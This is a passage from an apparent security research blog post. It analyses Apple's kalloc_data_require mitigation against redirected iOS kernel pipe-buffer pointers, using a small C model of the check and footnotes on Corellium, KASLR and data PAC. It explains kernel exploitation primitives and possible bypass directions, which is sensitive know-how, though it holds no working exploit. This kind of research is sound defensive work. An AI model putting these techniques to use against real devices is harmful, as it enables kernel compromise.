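/* Minimal description of the zone that owns an address. */
struct zone_model {
    const char *name;
    enum heap_class heap;
    size_t elem_size;
};

/* Model of the check: the buffer must come from a data-buffers zone and
 * the claimed size must fit within one element of that zone. Returns 1
 * if the access would be allowed, 0 where the kernel would panic. */
static int data_require_ok(const struct zone_model *zone, size_t size) {
    assert(zone);
    if (zone->heap != HEAP_DATA_BUFFERS) {
        return 0;
    }
    return size <= zone->elem_size;
}
```

In this model, a pipebuf whose buffer pointer has been redirected at another struct pipe fails the first condition regardless of size, which corresponds to the "in [pipe zone]" panic shown above, while a legitimate 512-byte pipe buffer passes as long as the recorded size does not exceed the element size.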
At the time of this writing, there are zero Google results for kalloc_data_require (Update: The source code is now available!), which indicates that perhaps this pipe technique isn't particularly relevant anymore (especially having been already affected by data PAC). It's possible that changing a pipe buffer pointer to some other type of KHEAP_DATA_BUFFERS object could pan out, but that's an open research question. If such an object exists then it likely doesn't belong in KHEAP_DATA_BUFFERS and that itself could be considered a vulnerability.
This new mini-mitigation was a fun discovery, and shows Apple's strategy of hardening to break techniques as a form of defense-in-depth. Looking through Brandon Azad's excellent survey of public iOS kernel exploits, many of them use pipe buffers either as "replacer" objects in a use-after-free scenario or placed after another type of object and used as the target object of an overflow. Since those involve keeping the pipe buffer pointer untouched (i.e. pointing at a legitimate pipe buffer allocation), this mitigation wouldn't affect those techniques. Perhaps Apple has seen the technique used in the wild, or they've simply identified it as a fairly obvious technique and decided to eliminate it preemptively.
The full source code is available on GitHub.
1. Are these realistic primitives? Perhaps not, but the purpose here is to practice on a technique, so the underlying bug (real or otherwise) is less important.
2. Corellium devices by default have KASLR disabled. Be sure to edit the settings before booting.
3. The buffer pointer is now subject to data PAC, which unfortunately breaks the technique on A12+. The rest of this post is focused on pre-PAC devices.
4. There are a bunch of other cool monitor commands exposed by Corellium. Run process plugin packet monitor help for a list!
5. Perhaps Corellium will add a way to hook kernel_base+offset in the future, which would make this much easier.
6. Neither of these is a great example for real exploitation, since there are other ways to read the version string and the kern.maxfilesperproc sysctl is both readable and writable from userspace, but they demonstrate the point.
7. IDA Pro had some bizarre disassembly issues with this function, but Binary Ninja handled it quite well.